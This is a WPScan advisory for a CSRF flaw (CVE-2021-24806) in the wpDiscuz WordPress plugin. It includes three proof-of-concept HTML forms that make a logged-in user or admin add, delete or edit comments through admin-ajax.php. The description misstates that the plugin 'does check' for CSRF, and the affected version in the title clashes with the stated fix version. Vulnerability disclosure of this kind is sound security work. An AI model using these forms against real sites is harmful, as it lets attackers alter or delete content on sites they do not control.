WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

wpDiscuz < 7.3.4 - Arbitrary Comment Addition/Edition/Deletion via CSRF

Description

The plugin does check for CSRF when adding, editing and deleting comments, which could allow attacker to make logged in users such as admin edit and delete arbitrary comment, or the user who made the comment to edit it via a CSRF attack. Attackers could also make logged in users post arbitrary comment.

Other affected actions: wpdCloseThread (to close/open threads), wpdStickComment (to stick/unstick a comment)

Proof of Concept

To make the logged in user add a comment
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdAddComment" />
      <input type="hidden" name="wc_comment" value="Comment added via CSRF" />
      <input type="hidden" name="submit" value="Post Comment" />
      <input type="hidden" name="wpdiscuz_unique_id" value="dummy" />
      <input type="hidden" name="postId" value="811" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


To delete a comment (CSRF against an admin)
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdDeleteComment" />
      <input type="hidden" name="id" value="27" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


To edit a comment (CSRF against user who made the comment or an admin to modify any comment)
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdSaveEditedComment" />
      <input type="hidden" name="commentId" value="6" />
      <input type="hidden" name="wc_comment" value="Attacker CSRF" />
      <input type="hidden" name="postId" value="811" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html> 

Affects Plugins

wpdiscuz
Fixed in version 7.3.2

References

CVE
CVE-2021-24806

YouTube Video

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter twitter
tomorrowisnew_
Verified

Yes

WPVDB ID
2746101e-e993-42b9-bd6f-dfd5544fa3fe

Timeline

Publicly Published

2021-10-11 (about 1 years ago)

Added

2021-10-11 (about 1 years ago)

Last Updated

2022-04-08 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us